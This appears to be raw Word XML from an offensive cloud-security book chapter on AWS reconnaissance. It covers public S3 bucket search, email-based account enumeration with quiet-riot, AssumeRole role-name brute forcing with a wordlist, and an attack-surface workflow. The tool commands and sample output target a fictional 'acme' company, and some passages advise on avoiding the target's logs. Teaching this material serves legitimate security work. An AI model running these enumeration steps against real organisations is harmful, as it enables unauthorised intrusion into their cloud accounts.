          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2C3D36"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1B3532CF"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"Grants": [ ... ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB0225"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6CBE2233"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grayhatwarfare-cli search --bucket-name acme-corp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532F9C9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Found 3 public buckets owned by 'aws-prod-billing':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA56638"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acme-corp-public-assets       234,812 objects  5.1 GiB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274F2FC9"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acme-corp-static-cdn          1,203,441 objects  61.2 GiB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E909C3"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 xml:space="preserve">acme-corp-terraform-state     14 objects         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="r"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>119 KiB   (!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E284C3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third bucket — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>terraform-state</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — is exactly the kind of leak that converts a recon pass into an initial-access foothold. Chapter 19 returns to Terraform state files as a credential source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B00B3AC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4.2  Account-ID enumeration via quiet-riot and similar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9913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Given an email address, you can determine whether that address is associated with an AWS account — unauthenticated and unthrottled — by exercising </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreateAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> style error paths. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>quiet-riot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>tool by Aquia and similar successors automate this. For a given email, they query the AWS console's sign-in endpoints and observe whether the server reveals account existence in its error messages. This is especially useful for identifying "shadow" accounts (marketing, HR, M&amp;A subsidiaries) whose existence is not well-known inside the target organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544F2F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quiet-riot enumerate --emails targets.txt --output accounts.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A2E4C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[+] Enumerating 147 email addresses across 6 enumeration primitives...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3EEC69" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[+] Primitive 1: S3 bucket access policy probe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B00209B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[+] Primitive 2: IAM role AssumeRole error leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEFB772" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[+] Primitive 3: SNS topic subscription confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D61CA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[+] Primitive 4: Cognito user pool enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D3FE6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[+] Primitive 5: Lambda function URL probe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A093944" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[+] Primitive 6: CloudFront distribution ownership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6AFF5"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31 valid AWS accounts discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F92412"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acme-finance@acmecorp.com       -&gt; exists  (account seed 2019)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE986C1"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platform-eng@acmecorp.com       -&gt; exists  (account seed 2017)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE36725"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 xml:space="preserve">m-and-a@acmecorp.com            -&gt; exists  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>(account seed 2024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF89F6E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[+] 147 emails processed in 3m 14s, output written to accounts.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36090026" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4.3  Role-name brute forcing through AssumeRole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12578CB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If you know an account ID — yours or a target's — you can enumerate role names inside that account without authenticating to it. The primitive is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD48CE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>arn:aws:iam::&lt;target-acct&gt;:role/&lt;guessed-name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> from any valid AWS identity you control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9ECCE5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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AWS returns two distinct error messages: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>role does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> versus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>role exists but you are not authorized to assume it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2740AA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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error differentiation is a silent oracle. Iterate over a wordlist of common role names (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWSControlTowerExecution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AdminRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>developer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>codebuild-ci</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github-actions-deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sso-permission-set-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE87A9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This technique is the basis of Pacu's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam__enum_roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and CloudFox's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>principals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> module. It leaves a CloudTrail entry in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> account — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> failures are logged as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>errorCode: AccessDenied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the exact role name tried — so a detection-capable defender will see your wordlist in real time. Use sparingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B31172"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1. Target attributio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domain → account I</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ACL / ARN leak / quiet-riot</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2. Surface enumeratio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public buckets, AMIs, snapshot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 URLs, API GW, CloudFron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3. DNS / CDN topolog</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Route53 zones, CNAME chain</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cloudfront.net, elb.amazonaws.co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4. Principa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>l</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enumeratio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role brut</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5. Credential searc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>h</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GitHub, DockerHub, PyPI, np</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trufflehog, gitleak</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6. App-layer SSRF prob</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IMDS endpoint reachabilit</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from each public endpoin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7. Federation topolog</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IdP (Okta/Entra) sign-in page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SSO start URL leaks org I</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8. Attac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>k</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surface ma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>p</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feeds Ch.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>5</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Loudness gradient — step 4 (AssumeRole brute) lands in target CloudTrail. Steps 1–3, 5, 7 land in no one's logs. Step 6 and 8 depend on application-layer logging</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Attack-surface mapping workflow. The order matters: build account attribution before you start principal-enumeration, because brute-forcing role names without the account ID is wasted traffic</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5BB13D85" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4.4  Public S3 discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399201D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S3 bucket names are globally unique and publicly enumerable. Multiple services index the observable set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315E605D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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GrayhatWarfare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — indexed listing of the (still-very-large) universe of public buckets. Searchable by bucket substring, owner, and object content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA3AAE7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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buckets.grayhatwarfare.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and equivalent — free tier gives enough for scoping; paid tier required for bulk search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE00E98" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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S3Scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — open-source tool that reads candidate bucket names from a wordlist or domain-derived permutation, queries each, and emits the ones that return anything other than </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>NoSuchBucket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179CE3A5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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Domain-to-bucket heuristics.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> For target </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, probe: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-assets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-prod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
